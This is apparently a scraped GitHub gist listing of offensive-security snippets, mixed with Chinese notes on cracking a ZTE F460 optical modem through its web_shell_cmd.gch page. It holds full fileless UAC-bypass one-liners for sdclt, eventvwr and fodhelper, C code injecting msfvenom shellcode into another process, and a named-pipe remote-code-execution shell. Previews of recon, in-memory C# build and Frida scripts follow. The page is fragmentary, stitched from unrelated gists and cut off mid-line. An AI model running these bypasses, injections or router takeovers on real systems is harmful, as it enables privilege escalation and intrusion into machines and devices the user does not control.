破解完光猫不过隐,继续琢磨,查了些智能设备安全的教程,分析智能设备或嵌入式设备安全,第一步是要提取固件,所以接下来要提取固件了。
通过/proc虚拟文件系统读取MTD分区表:
/ # cat /proc/mtd
dev: size erasesize name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"
Malayke
Malayke
/ named-pip-shell.py
Created
January 18, 2019 09:29
Make Web Remote Code Execution Vulnerabilities Great Again!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from cmd import Cmd | |
| import requests | |
| import readline | |
| import sys | |
| from base64 import b64encode | |
| from random import randrange | |
| import threading | |
| from time import sleep |
Malayke
/ Mounting JFFS2 Images on a Linux PC.md
Last active
December 1, 2018 05:34
Linux 系统挂载 JFFS2 格式文件 http://wiki.emacinc.com/wiki/Mounting_JFFS2_Images_on_a_Linux_PC
Mounting JFFS2 Images on a Linux PC
It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.
This procedure requires that the following kernel modules are available or built-in to the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.
One method of mounting JFFS2 images uses the mt
之前用的光猫不小心进水烧坏了,然后搞了个中兴 F460 拿来用,网上办法多如牛毛,但是试了都不行
电信贼的很,只要注册 LOID 之后他就把 telnet 给你关了,然后啥也搞不成,今天琢磨了一整天成功拿到telecomadmin密码,并能随时TELNET进路由器。
不破解就有普通用户权限,除了Wi-Fi密码,什么也改不了, 而且 Wi-Fi 名称必须得 ChinaNet 开头,更要命的是电信可以随时远程控制路由器
最简单的办法是有线或无线连接到路由器后访问 http://192.168.1.1/web_shell_cmd.gch 然后执行以下命令来获取超级用户密码
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #sdclt fileless UAC bypass | |
| regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| #eventvwr fileless UAC bypass | |
| %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec; | |
| #fodhelper fileless UAC bypass | |
| New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\ |
Malayke
/ release-android-debuggable.md
Created
November 4, 2018 13:38
— forked from nstarke/release-android-debuggable.md
How to make a Release Android App debuggable
Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage
( or adb shell run-as com.mypackge ls /data/data/com.mypackage/shared_prefs),
but on a production release app downloaded from an app store you're most likely to see:
run-as: Package 'com.mypackage' is not debuggable
Malayke
/ NotCreateRemoteThread.c
Created
September 9, 2018 15:10
— forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma comment(lib, "Shell32.lib") | |
| #include <windows.h> | |
| #include <shlobj.h> | |
| // msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
| int buf_len = 193; | |
| unsigned char buf[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
| "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" |
Malayke
/ getMoreDomains.py
Created
September 9, 2018 05:02
— forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import pprint | |
| import sys | |
| import dns.message | |
| import dns.query | |
| import dns.rdatatype | |
| import dns.resolver | |
| import dns.reversename | |
| import time |
Malayke
/ Build_In_Memory_CSharp_Project.txt
Created
April 6, 2018 02:29
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |
Malayke
/ frida-enumerate-loaded-classes.py
Last active
December 13, 2017 10:49
Frida 获取加固后的 apk class 名
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import frida, sys | |
| def on_message(message, data): | |
| if message['type'] == 'send': | |
| print("[*] {0}".format(message['payload'])) | |
| else: | |
| print(message) | |
| jscode = """ | |
| Java.perform(function() { |